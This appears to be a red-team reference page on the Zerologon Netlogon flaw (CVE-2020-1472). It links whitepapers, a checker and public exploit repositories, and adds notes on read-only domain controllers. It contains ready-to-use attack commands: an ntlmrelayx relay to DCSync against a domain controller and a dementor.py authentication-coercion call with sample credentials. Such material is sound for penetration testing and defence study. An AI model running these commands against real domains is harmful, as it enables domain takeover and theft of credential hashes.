# Zerologon

* [\[PDF\] Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) (Tom Tervoort)](https://www.secura.com/uploads/whitepapers/Zerologon.pdf)
* [\[PDF\] Understanding and Exploiting Zerologon (Lucideus)](https://dl.packetstormsecurity.net/papers/general/Understanding_and_Exploiting_Zerologon.pdf)

{% embed url="https://twitter.com/_dirkjan/status/1306280566313156608" %}

Check:

* <https://github.com/SecuraBV/CVE-2020-1472>

```
$ python3 zerologon_tester.py DC01 10.10.13.38
```

Exploit:

* <https://github.com/dirkjanm/CVE-2020-1472>
* <https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472>

The exploits above **will break the domain!** Use the technique below by @dirkjanm to abuse Zerologon safely:

* <https://dirkjanm.io/a-different-way-of-abusing-zerologon/>

```
$ ntlmrelayx.py -t dcsync://DC01.megacorp.local -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC02.megacorp.local
```

## RODC Notes

Checking whether a DC is an RODC (look at the `Flags` line in the output: a writable DC lists the `WRITABLE` flag, an RODC does not):

```
PS > nltest.exe /dsgetdc:megacorp.local
PS > nltest.exe /dsgetdc:megacorp.local /server:DC1
```

* <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9>
* <https://lists.samba.org/archive/samba-technical/2016-November/117016.html>
* <https://github.com/gentilkiwi/mimikatz/blob/fe4e98405589e96ed6de5e05ce3c872f8108c0a0/mimikatz/modules/kuhl_m_lsadump.c#L2467>
* <https://social.technet.microsoft.com/Forums/Lync/en-US/3f29f03e-9d9b-43ba-b628-3f0afc25352e/user-amp-computer-authentication-through-rodc?forum=winserverDS>

> "When a user authenticates to an RODC a check is performed to see if the password is cached. If the password is cached, the RODC will authenticate the user account locally. If the user’s password is not cached, then the RODC forwards the authentication request to a writable Domain Controller which in turn authenticates the account and passes the authenticated request back to the RODC. Once the user account is authenticated, the RODC makes another request for the replication of the user’s password in a unidirectional replication providing the account has been configured to allow replication. In order to allow the user password to be cached on RODC, you could set up it by configuring the Password Replication Policy."

So when authenticating against an RODC whose Password Replication Policy does not allow the machine account's password to be cached, the call may fail with `STATUS_NO_TRUST_SAM_ACCOUNT`.
